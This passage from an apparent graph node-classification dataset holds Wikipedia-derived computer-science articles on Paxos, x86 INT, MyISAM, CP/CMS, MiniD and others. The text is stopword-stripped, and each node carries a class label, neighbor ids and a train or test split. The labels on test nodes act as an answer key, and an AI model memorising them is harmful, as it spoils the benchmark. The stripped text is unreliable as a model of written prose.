derecho c++ software library cloud-scale state machine replication offers paxos protocol integrated self-managed virtually synchronous membership protocol matches keidar shraer optimality bounds maps efficiently modern remote dma rdma datacenter hardware uses tcp rdma available order simplify presentation paxos following assumptions definitions made explicit techniques broaden applicability known literature covered article general consensus algorithm make progress using formula_1 processors despite simultaneous failure formula_2 processors words number non-faulty processes must strictly greater number faulty processes however using reconfiguration protocol may employed survives number total failures long f fail simultaneously paxos describes actions processors roles protocol client acceptor proposer learner leader typical implementations single processor may play one roles time affect correctness protocol—it usual coalesce roles improve latency and/or number messages protocol quorums express safety consistency properties paxos ensuring least surviving processor retains knowledge results quorums defined subsets set acceptors two subsets two quorums share least one member typically quorum majority participating acceptors example given set acceptors b c majority quorum would three acceptors b c c b b c generally arbitrary positive weights assigned acceptors case quorum defined subset acceptors summary weight greater half total weight acceptors attempt define agreed value v performed proposals may may accepted acceptors proposal uniquely numbered given proposer e.g. proposal may form n v n unique identifier proposal v actual proposed value value corresponding numbered proposal computed part running paxos protocol need order guarantee safety also called consistency paxos defines three properties ensures always held regardless pattern failures deployments paxos participating process acts three roles proposer acceptor learner reduces message complexity significantly without sacrificing correctness merging roles protocol collapses efficient client-master-replica style deployment typical database community benefit paxos protocols including implementations merged roles guarantee safety properties typical implementation message flow covered section multi-paxos protocol basic paxos family instance execution basic paxos protocol decides single output value protocol proceeds several rounds successful round 2 phases phase 1 divided parts b phase 2 divided parts b see description phases remember assume asynchronous model e.g processor may one phase another processor may another accept message interpreted request accept proposal please note acceptor accept multiple proposals happen another proposer unaware new value decided starts new round higher identification number n case acceptor promise later accept new proposed value even though accepted another one earlier proposals may even different values presence certain failures however paxos protocol guarantee acceptors ultimately agree single value following diagrams represent several cases/situations application basic paxos protocol cases show basic paxos protocol copes failure certain redundant components distributed system note values returned promise message null first time proposal made since acceptor accepted value round diagram 1 client 1 proposer 3 acceptors i.e quorum size 3 2 learners represented 2 vertical lines diagram represents case first round successful i.e process network fails v last va vb vc simplest error cases failure acceptor quorum acceptors remains alive failure redundant learner cases protocol requires recovery i.e still succeeds additional rounds messages required shown next two diagrams/cases following diagram one acceptors quorum fails quorum size becomes 2 case basic paxos protocol still succeeds following case one redundant learners fails basic paxos protocol still succeeds case proposer fails proposing value agreement reached specifically fails middle accept message one acceptor quorum receives value meanwhile new leader proposer elected shown detail note 2 rounds case rounds proceed vertically top bottom complex case multiple proposers believe leaders instance current leader may fail later recover proposers already re-selected new leader recovered leader learned yet attempts begin one round conflict current leader diagram 4 unsuccessful rounds shown could suggested bottom diagram typical deployment paxos requires continuous stream agreed values acting commands distributed state machine command result single instance basic paxos protocol significant amount overhead would result leader relatively stable phase 1 becomes unnecessary thus possible skip phase 1 future instances protocol leader achieve round number included along value incremented round leader multi-paxos reduces failure-free message delay proposal learning 4 delays 2 delays following diagram one instance execution basic paxos protocol initial leader proposer shown note multi-paxos consists several instances basic paxos protocol v last va vb vc case subsequence instances basic paxos protocol represented i+1 use leader phase 1 subsequent instances basic paxos protocol consist prepare promise sub-phases skipped note leader stable i.e crash change common deployment multi-paxos consists collapsing role proposers acceptors learners servers end clients servers following diagram represents first instance basic paxos protocol roles proposer acceptor learner collapsed single role called server subsequent instances basic paxos protocol leader previous instances basic paxos protocol phase 1 skipped number optimisations performed reduce number exchanged messages improve performance protocol etc optimisations reported cheap paxos extends basic paxos tolerate f failures f+1 main processors f auxiliary processors dynamically reconfiguring failure reduction processor requirements comes expense liveness many main processors fail short time system must halt auxiliary processors reconfigure system stable periods auxiliary processors take part protocol two processors p q one processor distinguish failure processor failure communication medium third processor needed however third processor participate choosing sequence commands must take action case p q fails nothing either p q continues operate system third processor therefore small/slow/cheap one processor primarily devoted tasks example involving three main acceptors one auxiliary acceptor quorum size three showing failure one main processor subsequent reconfiguration fast paxos generalizes basic paxos reduce end-to-end message delays basic paxos message delay client request learning 3 message delays fast paxos allows 2 message delays requires 1 system comprised 3f+ 1 acceptors tolerate f faults instead classic 2f+1 2 client send request multiple destinations intuitively leader value propose client could send accept message acceptors directly acceptors would respond basic paxos sending accepted messages leader every learner achieving two message delays client learner leader detects collision resolves collision sending accept messages new round accepted usual coordinated recovery technique requires four message delays client learner final optimization occurs leader specifies recovery technique advance allowing acceptors perform collision recovery thus uncoordinated collision recovery occur three message delays two message delays learners also acceptors generalized consensus explores relationship operations replicated state machine consensus protocol implements main discovery involves optimizations paxos conflicting proposals could applied order i.e. proposed operations commutative operations state machine cases conflicting operations accepted avoiding delays required resolving conflicts re-proposing rejected operations concept generalized ever-growing sequences commutative operations known stable thus may executed protocol tracks sequences ensuring proposed operations one sequence stabilized allowing operation non-commuting become stable order illustrate generalized paxos example shows message flow two concurrently executing clients replicated state machine implementing read/write operations two distinct registers b note table indicates operations non-commutative possible sequence operations since codice_1 commutes codice_2 codice_3 one possible permutation equivalent previous order following practice commute occurs operations proposed concurrently message flow shows us generalized paxos leverage operation semantics avoid collisions spontaneous ordering network fails allows protocol practice quicker fast paxos however collision occurs generalized paxos needs two additional round trips recover situation illustrated operations writeb readb schema general case round trips unavoidable come fact multiple commands accepted round makes protocol expensive paxos conflicts frequent hopefully two possible refinements generalized paxos possible improve recovery time paxos may also extended support arbitrary failures participants including lying fabrication messages collusion participants selective non-participation etc types failures called byzantine failures solution popularized lamport byzantine paxos introduced castro liskov adds extra message verify acts distribute knowledge verify actions processors fast byzantine paxos introduced martin alvisi removes extra delay since client sends commands directly acceptors note accepted message fast byzantine paxos sent acceptors learners fast paxos sends accepted messages learners failure scenario protocols learner waits receive f+1 identical messages different acceptors occur acceptors also aware since exchanged messages broadcast round correct acceptors re-broadcast agreed value emergence high speed reliable datacenter networks support remote dma rdma substantial interest optimizing paxos leverage hardware offloading network interface card network routers provide reliability network-layer congestion control freeing host cpu tasks derecho c++ paxos library open-source paxos implementation explores option derecho offers classic paxos data durability across full shutdown/restart sequences vertical paxos atomic multicast in-memory replication state-machine synchronization paxos protocols employed derecho needed adapted maximize asynchronous data streaming remove sources delay leader critical path enables derecho sustain full bidirectional rdma data rate contrast although traditional paxos protocols migrated rdma network simply mapping message send operations native rdma operations leaves round-trip delays critical path high-speed rdma networks even small delays large enough prevent utilization full potential bandwidth",
    "neighbors": [
      2689,
      1669,
      7816,
      7315,
      1049,
      6433,
      7841,
      4390,
      2217,
      7085,
      5047,
      70,
      7750,
      4696,
      8025,
      11612,
      3326,
      3820,
      7409,
      1142,
      121,
      3582
    ],
    "mask": "Train"
  },
  {
    "node_id": 7500,
    "label": 5,
    "text": "LysKOM:lyskom lyskom kom-based conferencing system developed lysator academic computer society linköping university linköping institute technology seen cross news e-mail presence speed irc im-networks common client lyskom emacs lisp client among others www-based client also exists server clients released terms gnu general public license thus free software lyskom protocol uses port 4894 protocol implementations exist python perl pike based frameworks number programs bridging lyskom systems written notable among python software importing exporting e-mail used whole enables lyskom system act primitive list manager configuring exporter reexport imported e-mail also possible use lyskom like multi-user e-mail client posting mailing lists lyskom also refers specific installation hosted lysator kom.lysator.liu.se",
    "neighbors": [
      8582,
      8554,
      6993,
      3218,
      3675,
      7646
    ],
    "mask": "Test"
  },
  {
    "node_id": 7501,
    "label": 3,
    "text": "INT_(x86_instruction):int x86 instruction int assembly language instruction x86 processors generates software interrupt takes interrupt number formatted byte value written assembly language instruction written like codice_2 software interrupt generated 0-255 depending context compiler assembler software interrupt number often given hexadecimal value sometimes prefix 0x suffix h example codice_3 generate software interrupt 0x13 19 decimal causing function pointed 20th vector interrupt table executed typically dos api call generating software interrupt processor calls one 256 functions pointed interrupt address table located first 1024 bytes memory real mode see interrupt vector therefore entirely possible use far-call instruction start interrupt-function manually pushing flag register one useful dos software interrupts interrupt 0x21 calling different parameters registers mostly ah al could access various io operations string output unix systems derivatives use software interrupts exception interrupt 0x80 used make system calls accomplished entering 32-bit value corresponding kernel function eax register processor executing int 0x80 int3 instruction one-byte-instruction defined use debuggers temporarily replace instruction running program order set code breakpoint general int xxh instructions encoded using two bytes makes unsuitable use patching instructions one byte long see sigtrap opcode int3 codice_4 opposed opcode int immediate8 codice_5 since dedicated codice_4 opcode desired special properties debugging shared normal two-byte opcode int3 assemblers normally generate generic codice_7 opcode mnemonics",
    "neighbors": [
      389,
      5000,
      1952,
      9533,
      2811,
      5312,
      6082,
      6596,
      5457,
      6868,
      5080,
      4441,
      602,
      477,
      6118,
      1776,
      499,
      5492,
      1915
    ],
    "mask": "None"
  },
  {
    "node_id": 7502,
    "label": 3,
    "text": "XLink_Kai:xlink kai xlink kai method developed team-xlink online play video games support lan multiplayer modes enables players nintendo gamecube nintendo switch playstation 2 playstation 3 playstation 4 playstation portable playstation vita xbox xbox 360 xbox one play games across internet using network configuration simulates local area network lan notably also allows original xbox games played online following xbox live shutdown april 21 2010 similar save nintendo wi-fi wii certain gamespy titles saints row 2 played online gamespy network shutdown may 31 2014 purpose software allow consoles network internet via consoles local network play capabilities xlink kai acts tunneling software installed compatible microsoft windows macos linux computer network console upon console initiating game network play feature console requests routed computer xlink listening requests allows consoles found internet search making appear player console consoles simply connected local network modified modded xbox consoles much functionality provided directly within xbox media center xbmc xbox gui kai client still required running computer user network players control connections directly console also possible run kai client linux-based devices wireless routers nas devices running third party firmware replacements dd-wrt slugos users log onto xlink servers using xtag username similar gamertag xbox live xlink arenas compatible system link game popular games halo 2 sub-arenas based regions within attempt minimize lag players arenas automatically synced simulating lan connection thus able play games normally using system link functions addition game arenas kai general chat room quarantine arena moderators isolate abusive players xlink also lets players create self-moderated private arenas xlink kai supports nintendo gamecube playstation 2 nintendo switch playstation 3 playstation 4 playstation portable playstation vita xbox xbox 360 xbox one lan enabled games features integrated chat lobbies players meet converse prior starting game session clan tournament ladder lobbies also integrated games list compatible games found team-xlink website special considerations made xbox 360 designed microsoft incompatible kind software console automatically drop connections ping 30 milliseconds system link connection however patch released bypass limit modified consoles one point support nintendo ds planned never completed xbmc microsoft xbox console control client xlink kai allows control xlink kai software program user xbox via xbmc gui mc360 skin xbmc blackbolt gives xlink kai client xbmc-live familiar interface resembling xbox 360 factory dashboard xbox live connectivity friends arenas etc xlink kai removed xbmc builds 14099 later",
    "neighbors": [
      10788,
      6345,
      8937,
      8428,
      6797,
      9868,
      7983,
      10316,
      7859,
      823,
      6873,
      10109
    ],
    "mask": "Test"
  },
  {
    "node_id": 7503,
    "label": 4,
    "text": "Data_Security_Council_of_India:data security council india data security council india dsci premier industry body data protection india setup nasscom® committed making cyberspace safe secure trusted establishing best practices standards initiatives cyber security privacy dsci brings together national governments agencies industry sectors including it-bpm bfsi telecom industry associations data protection authorities think tanks public advocacy thought leadership capacity building outreach initiatives dsci engages governments regulators industry associations think tanks policy matters strengthen thought leadership cyber security privacy dsci develops best practices frameworks publishes studies surveys papers builds capacity security privacy cyber forensics training certification program professionals law enforcement agencies engages stakeholders various outreach initiatives including events awards chapters consultations membership programs dsci also endeavors increase india ’ share global security product services market global trade development initiatives aim strengthen security privacy culture india dsci certified privacy professional dcpp©",
    "neighbors": [
      2300,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7504,
    "label": 2,
    "text": "DEC_Radix-50:dec radix-50 radix-50 commonly called rad-50 rad50 dec squoze uppercase character encoding created digital equipment corporation use decsystem pdp vax computers radix-50 40-character repertoire 050 octal encode six characters plus four additional bits one 36-bit word pdp-6 pdp-10/decsystem-10 decsystem-20 three characters plus two additional bits one 18-bit word pdp-9 pdp-15 three characters one 16-bit word pdp-11 vax actual encoding differed 36-bit 16-bit systems name squoze borrowed scheme used share 709 operating system representing object code symbols packed six characters 50-character alphabet plus two additional flag bits one 36-bit word radix-50 36-bit systems commonly used symbol tables assemblers compilers supported six-character symbol names left four bits encode properties symbol radix-50 normally used 36-bit systems encoding ordinary character strings file names normally encoded six 6-bit characters full ascii strings five 7-bit characters one unused bit per 36-bit word radix-50 called radix 50 format used digital 18-bit pdp-9 pdp-15 computers store symbols symbol tables leaving two extra bits per word symbol classification bits strings dec 16-bit systems encoded 8-bit bytes others used radix-50 radix-50 strings encoded successive words needed first character within word located significant position example using pdp-11 encoding string abcdef character values 1 2 3 4 5 6 would encoded word containing value 1×40 2×40 3×40 1,683 followed second word containing value 4×40 5×40 6×40 6,606 thus 16-bit words encoded values ranging 0 three spaces 63,999 999 fewer three characters word last word string padded trailing spaces several minor variations encoding families example rt-11 operating system considered character corresponding value undefined utility programs used value represent character instead use rad-50 source filename size conventions used digital equipment corporation pdp-11 operating systems using rad-50 encoding six characters filename could stored two 16-bit words three extension file type characters could stored third 16-bit word period separated filename extension implied i.e. stored always assumed present rad-50 also commonly used symbol tables various pdp-11 programming languages",
    "neighbors": [
      10590,
      1253,
      8262,
      5384,
      3563,
      11151,
      9361,
      3443,
      11604,
      6837,
      8474,
      2078
    ],
    "mask": "None"
  },
  {
    "node_id": 7505,
    "label": 3,
    "text": "Pipeline_stall:pipeline stall design pipelined computer processors pipeline stall delay execution instruction order resolve hazard decoding stage control unit determine decoded instruction reads register instruction currently execution stage writes condition holds control unit stall instruction one clock cycle also stalls instruction fetch stage prevent instruction stage overwritten next instruction program prevent new instructions fetched instruction decoding stage stalled value pc register instruction fetch stage preserved prevent changes values preserved instruction causing conflict passed execution stage event often called bubble analogy air bubble fluid pipe architectures execution stage pipeline must always performing action every cycle case bubble implemented feeding nop operation instructions execution stage bubble flushed past following two executions four instructions 4-stage pipeline whatever reason delay fetching purple instruction cycle 2 leads bubble created delaying instructions well example shows bubble inserted classic risc pipeline five stages instruction fetch id instruction decode ex execute mem memory access wb register write back example data available mem stage 4th stage first instruction required input ex stage 3rd stage second instruction without bubble ex stage 3rd stage access output previous ex stage thus adding bubble resolves time dependence without needing propagate data backwards time impossible",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      10786,
      6181,
      8231,
      3630,
      6705,
      7218,
      2620,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      2745,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      3317,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      9003,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      936,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7506,
    "label": 1,
    "text": "MyISAM:myisam myisam default storage engine mysql relational database management system versions prior 5.5 released december 2009 based older isam code many useful extensions myisam table stored disk three files partitioned files names begin table name extension indicate file type mysql uses .frm file store definition table file part myisam engine instead part server data file .myd mydata extension index file .myi myindex extension myisam optimized environments heavy read operations writes none typical area one could prefer myisam data warehouse involves queries big tables update tables done database use usually night reason myisam allows fast reads structure indexes entry points record data file pointer offset beginning file way records quickly read especially format fixed thus rows constant length inserts easy new rows appended end data file however delete update operations problematic deletes must leave empty space rows offsets would change goes updates length rows becomes shorter update makes row longer row fragmented defragment rows claim empty space optimize table command must executed simple mechanism myisam index statistics usually quite accurate however simplicity myisam several drawbacks major deficiency myisam absence transactions support also foreign keys supported normal use cases innodb seems faster myisam versions mysql 5.5 greater switched innodb engine ensure referential integrity constraints higher concurrency myisam supports fulltext indexing opengis data types mariadb storage engine called aria described crash-safe alternative myisam however mariadb developers still work myisam code major improvement segmented key cache enabled myisam indices cache divided segments improves concurrency threads rarely need lock entire cache mariadb myisam also supports virtual columns drizzle include myisam",
    "neighbors": [
      11392,
      8195,
      10632,
      10258,
      10389,
      7453,
      1950,
      9503,
      7080,
      7339,
      7983,
      9010,
      6721,
      8393,
      5964,
      5198,
      9687,
      10459,
      6245,
      7654,
      8295,
      8683,
      5612,
      2413,
      7022,
      3188,
      4598,
      10873,
      2810,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7507,
    "label": 2,
    "text": "CP/CMS:cp/cms cp/cms control program/cambridge monitor system discontinued time-sharing operating system late 60s early 70s known excellent performance advanced features three distinct versions implementation substantial redesign predecessor evolutionary step forward cp-67/cms first widely available virtual machine architecture ibm pioneered idea research systems m44/44x used partial virtualization cp-40 used full virtualization addition role predecessor vm family cp/cms played important role development operating system os theory design ibm system/370 time-sharing industry creation self-supporting user community anticipated today free software movement cp/cms built ibm cambridge scientific center csc research development lab ties mit leadership robert creasy system goals development process release legacy breakthrough technology set system apart oses day large ibm projects open-source system made available source code form ibm customers charge – part unsupported ibm type-iii library cp/cms users supported unusual circumstances described history section led situation cp/cms consisted two main components cp/cms virtual machine concept important step forward operating system design ibm reimplemented cp/cms vm/370 product line released 1972 virtual memory added s/370 series vm/370 successors z/vm remain wide use today important note ibm reimplemented cp-67 cp-40 simply rename repackage vm coexisted cp/cms successors many years thus appropriate view cp/cms independent os distinct vm family cp/cms distributed source code form many cp/cms users actively involved studying modifying source code direct user involvement vendor-supplied operating system unusual cp/cms era many vendors distributed operating systems machine-readable source code possible os/360 dos/360 number later mainstream ibm operating systems distributed way systems awareness system source code also involved sysgen process comparable kernel build modern systems also installing starter set forty years later hercules emulator used run fossilized versions systems based source code treated part public domain importance operating system source code changed time 1969 os software included cost hardware vendor complete responsibility entire system hardware software made distribution medium relatively unimportant ibm unbundling os software delivered ibm system control program scp software eventually object code form still additional charge complicated reasons cp/cms released normal way supported ibm made part unsupported ibm type-iii library collection software contributed ibm personnel similarly software contributed customers formed type-iv library ibm distributed library customers use 'as lack direct ibm support products forced active users support encouraged modifications mutual support cp/cms type-iii products early forms free software source code distribution ibm operating systems may continued time e.g os/360 dos/360 dos/vse mvs even tss/370 today generally considered public domain since arguably published without copyright notice 1978 however unsupported status cp/cms placed different pressures user community created need source code distribution curiously cp/cms contributed type-iii library mit lincoln laboratory ibm despite fact system built ibm cambridge scientific center surprising decision described form collusion outmaneuver ibm political forces opposed time-sharing may also reflect amount formal informal input mit union carbide contributed design implementation cp-40 s/360-67 cp-67 cms see history cp/cms historical notes insights references topic many cp/cms users made extensive modifications copies source code much work shared among sites important changes found way back core system users national css academic sites continued independent development cp/cms rather switching vm/370 became available efforts diverged community today would termed software fork ibm released vm/370 source code distribution vm continued several releases vm project adopt use pl/s internal systems programming language mandated use within ibm many comparable projects use pl/s would made source code distribution impossible ibm attempted turn away assembly language higher level languages early 1965 making substantial use pl/s 1969 e.g mvs pl/s considered trade secret time available customers ibm apparently made exceptions policy much later vm user community continued make important contributions software cp/cms type-iii period os dos sites exhibited active user involvement deep operating system internals found many vm sites reverse support helped cp/cms concepts survive evolve despite vm second class citizen status ibm fundamental cp/cms architectural strategic parameters established cp-40 began production use ibm cambridge scientific center early 1967 effort occurred complex political technical milieu discussed length supported first-hand quotes wikipedia article history cp/cms nutshell cp/cms architecture revolutionary time system consisted virtualizing control program cp created multiple independent virtual machines vms platform virtualization possible two elements ibm system/360-67 program running 'problem state using privileged instruction invalid memory address would cause hardware raise exception condition trapping conditions cp could simulate appropriate behavior e.g performing i/o paging operations guest operating system would run 'supervisor state bare machine run 'problem state cp result fully virtualized environment virtual machine set virtual devices mapped system real hardware environment thus given dial-up teletype presented vm instance virtual console note cp-67 certain model-dependent diagnostic instructions virtualized notably diag instruction ultimately later development ibm elsewhere diag instructions used create non-virtualized interface became called hypervisor client operating systems could use mechanism communicate directly control program offered dramatic performance improvements s/360 operating system could fact run cp normal users ran cambridge monitor system cms simple single-user operating system cms allowed users run programs manage virtual devices cp-67 versions 1 2 support virtual memory inside virtual machine added version 3 point testing development cp could done running full copy cp/cms inside single virtual machine cp/cms operating system work cp-370 development mvs testing ran four- five-level deep stacks hardware os simulations cp/cms design different ibm previous monolithic operating systems separates complex big system dispatching hardware management mass storage little system application program execution file i/o console input/output re-categorization systems entities prevents bug one users system affecting model feature microkernel operating systems ibm decision implement virtualization virtual memory features subsequent s/370 design although missing initial s/370 series reflects least part success cp/cms approach turn survival success ibm vm operating system family virtualization technology general owe much s/360-67 many respects ibm cp-67 cp/cms products anticipated heavily influenced contemporary virtualization software vmware workstation xen microsoft virtual pc",
    "neighbors": [
      6150,
      6153,
      2058,
      3082,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      10803,
      9780,
      7733,
      9784,
      10809,
      573,
      576,
      5697,
      5702,
      7248,
      10333,
      97,
      9829,
      6248,
      8298,
      6772,
      7285,
      9335,
      2168,
      1147,
      2172,
      3197,
      1150,
      2179,
      10883,
      6797,
      4238,
      9361,
      9366,
      6296,
      9370,
      7325,
      9887,
      2212,
      8879,
      3248,
      6837,
      7349,
      2236,
      1219,
      8388,
      6342,
      9932,
      5840,
      1235,
      7382,
      8410,
      1253,
      5363,
      8439,
      2811,
      3323,
      2813,
      9468,
      5378,
      10499,
      1804,
      10508,
      273,
      8466,
      11539,
      789,
      3359,
      10016,
      6438,
      295,
      2345,
      10537,
      1323,
      7983,
      7477,
      9525,
      823,
      10040,
      4409,
      7483,
      8509,
      318,
      11075,
      4423,
      840,
      5457,
      1362,
      7507,
      11601,
      2910,
      863,
      10590,
      868,
      3429,
      6503,
      8551,
      5492,
      8063,
      6529,
      4996,
      394,
      3978,
      7053,
      7057,
      11667,
      11673,
      8092,
      6557,
      421,
      11184,
      5041,
      8627,
      9655,
      5049,
      5562,
      6075,
      6078,
      9151,
      8136,
      1513,
      6128,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 7508,
    "label": 3,
    "text": "Model-specific_register:model-specific register model-specific register msr various control registers x86 instruction set used debugging program execution tracing computer performance monitoring toggling certain cpu features introduction 80386 processor intel began introducing experimental features would necessarily present future versions processor first two test registers t6 t7 allowed 80386 speed virtual-to-physical address conversions three additional test registers followed 80486 tr3–tr5 enabled testing processor caches code data none five registers implemented subsequent pentium processor introduction pentium processor intel provided pair instructions codice_1 codice_2 access current future model-specific registers well cpuid instruction determine features present particular model many registers proven useful enough retained intel classified architectural model-specific registers committed inclusion future product lines reading writing registers handled codice_1 codice_2 instructions respectively privileged instructions executed operating system use linux msr kernel module creates pseudo file /dev/cpu/ x /msr unique x processor processor core user permissions read and/or write file use file i/o api access registers msr-tools package provides reference implementation documentation regarding msrs certain processor implementation supports usually found processor documentation cpu vendor examples rather well-known msrs memory type range registers mtrrs address-range registers arrs",
    "neighbors": [
      6924,
      4237,
      8590,
      499,
      6868,
      1915,
      6078,
      2847
    ],
    "mask": "Test"
  },
  {
    "node_id": 7509,
    "label": 2,
    "text": "Aplay:aplay aplay command-line audio file player alsa sound card driver supports several file formats multiple sound cards multiple devices supported soundfile formats sampling rate bit depth forth automatically determined soundfile header play raw file foobar 22050-hz mono 8-bit mu-law .au file",
    "neighbors": [
      6293,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 7510,
    "label": 4,
    "text": "Rajesh_De:rajesh de rajesh raj de born circa 1972 american lawyer former u.s. government official early 2011 april 2012 de served white house staff secretary april 2012 march 2015 general counsel u.s. national security agency period marked controversy disclosures nsa surveillance leaving nsa joined law firm mayer brown de jd harvard law school ab harvard college graduated class 1999",
    "neighbors": [
      7893,
      7887
    ],
    "mask": "None"
  },
  {
    "node_id": 7511,
    "label": 2,
    "text": "Usage_share_of_desktop_operating_systems:usage share desktop operating systems usage share desktop operating systems percentage operating systems os used computers approximately market share so-called retronym desktop operating system also run e.g laptops originally computers running operating systems desktop computers introduction so-called new class mobile operating systems desktop got part name former class oses computers running oses desktop metaphor style gui unlike mobile oses see also usage share operating systems breakdown share desktop mobile styles operating systems separately share operating systems part across classes three main divisions desktop computer operating systems microsoft windows apple macos linux variants section complete section complete section complete",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      2259,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Train"
  },
  {
    "node_id": 7512,
    "label": 1,
    "text": "Amazon_DocumentDB:amazon documentdb amazon documentdb fully managed proprietary nosql database service supports document data structures mongodb workloads amazon documentdb currently available california oregon north virginia ireland regions aws",
    "neighbors": [
      8962,
      8451,
      6027,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      5660,
      11038,
      6307,
      11556,
      9766,
      5159,
      2217,
      6444,
      7983,
      8495,
      3121,
      7352,
      10681,
      2496,
      4289,
      11201,
      1224,
      5960,
      8520,
      10185,
      4429,
      590,
      7248,
      1362,
      467,
      9682,
      2901,
      8921,
      735,
      6367,
      4194,
      11646,
      5732,
      9828,
      1001,
      10090,
      3819,
      5612,
      7660,
      8181,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 7513,
    "label": 9,
    "text": "MiniD:minid minid renamed croc programming language small lightweight extension language vein lua squirrel designed used mainly programming language supports object-oriented imperative programming paradigms well simple functional aspects distributed licence zlib/libpng minid free software minid began june 2006 idea statically-typed language much like stripped-down version programming language reason name minid work began compiler creator jarrett billingsley realized large project language becoming decided recast language something simpler implement result lua-like language c-style syntax next several months minid acquired features various languages squirrel-like classes d-like module system lua-like collaborative multithreading august 1 2007 thirteen months planning programming version 1.0 reference implementation released version 1.0 language specification frozen june 15 2009 version 2 minid released version 2 brings major reimplementation library order support garbage collector rather relying underlying garbage collector better behavior realtime applications games version 2 also brings several changes language standard libraries development minid stopped june 2011 used base new language called croc author minid provides small flexible set data types similar lua squirrel unlike lua minid provides explicit support object-oriented programming classes minid also provides module system coroutines core language features like lua minid garbage-collected support first-class functions closures tail recursion minid also tries robust typical dynamic languages making easier catch bugs sooner example implicit variable declarations accessing globals exist throws error instead giving default value lua another helpful feature parameter type constraints way specifying valid types function parameters may accept checks still performed runtime unlike static languages concise syntax negligible performance impact make much attractive easy-to-use similar solutions dynamic languages help greatly catching bugs would cause functions malfunction corrupt data structures called unexpected parameter types small example given following example code minid 2 note due technical limitations keywords highlighted wikipedia source highlighter minid hello world program minid every minid source file must begin module declaration simplicity module declaration omitted rest examples example shows simple class two fields x initialized 0 default class constructor declared 'this keyword takes two parameters assigns instance fields syntax x shorthand this.x object upon method called like lua python members must accessed explicitly class one method 'tostring called automatically object needs converted string somewhat unusual syntax used inspired many functional languages shorthand following finally class instantiated calling like function similarly python squirrel instance printed using 'writeln 'tostring method called program outputs example demonstrates minid array manipulation abilities unlike lua minid separate array type example array created holds values 1 10 using 'array.range function 'map method arrays used takes function literal returns square parameter literal syntax inspired functional languages haskell shorthand following b printed shows first ten squares shows shorter way achieving result using minid list comprehensions syntax close python example shows 'foreach loop used iterate arrays tables strings shown well types example shows use 'foreach loop iterate coroutine way coroutines used generators shows simple use parameter type constraints way putting runtime checks parameters restrict allowable types 'first function allows arrays strings parameter x first two print statements work fine third throws error since integers allowable type x",
    "neighbors": [
      2304,
      9345,
      8262,
      4777,
      8554,
      5612,
      5165,
      7983,
      338,
      8854,
      5783,
      10198,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7514,
    "label": 9,
    "text": "Honeywell_ARGUS:honeywell argus argus assembly language devised 1960s honeywell honeywell 800 1800 computers name argus acronym standing automatic routine generating updating system assembly languages line argus copied one card related one word memory except one argus command reserve could reserve specified number words position specified reserve command also exceptional prescribing initial data reserved words exceptions machine language words coded order argus lines honeywell 800 1800 main memory control memory using ferrite cores main memory 4 16 banks depending customer requirements bank contained 2048 words 48 bits actual number banks individual installation multiple 4 control memory 256 registers 16 bits given time machine could theoretically run one operating system 7 application programs exclusive use 32 registers program required 2048 words data instructions combined split segments 2048 words less segment would exclusive use one bank main memory special instructions pass control one segment another line argus command fields follows location optional argus name assigned word memory address word assigned memory argus name line would linked position corresponding word lines argus could refer name words would assigned correct memory address within program name unique field may begin r rest card remarks field may begin x x addressname line x lines placed away lines marked addressed x +n addressname address field field may begin maskname line defines mask operation argus name machine language command argus-only command could followed address mask required commands extra information b c addresses translated machine code see b addresses typically two input words c address destination id normally serial number punched card card punch machine used resort cards might dropped machine language command used one word 48 bits split 4 sections 12 bits first 12 bits specified operation ancillary information including offset address mask command three sections b c addresses mask specified final result command would pass mask reaching destination example bit 17 mask 1 result would go bit 17 destination bit 17 mask 0 something else would go bit 17 destination might 0 might unchanged bit 17 input word depending command segment allowed 16 masks consecutive words beginning address whose last four bits 0 argus location names special register called mask register held base address command field 4 bits hold offset address named mask commands b c address sections used denote actual locations memory six modes addressing two rarely used remainder direct direct special register indirect addressing indexed main memory address specified directly command machine language one 12 bits indicates direct mode 11 specify exact address 11 bits represent numbers 0 2047 nothing larger however efficient type addressing dilemma bank 2048 words segment confined one bank two ways writing line argus code 1 name previously defined location column number decimal added e.g buffer0+59 2 location several lines words beyond current line e.g c,2 means line two beyond one 12 bits mode addressing address register control memory identified also increment 0 32 specified main memory address register control memory processor first obtain main memory address register call word main memory address finally increase increment register value amount specified 16 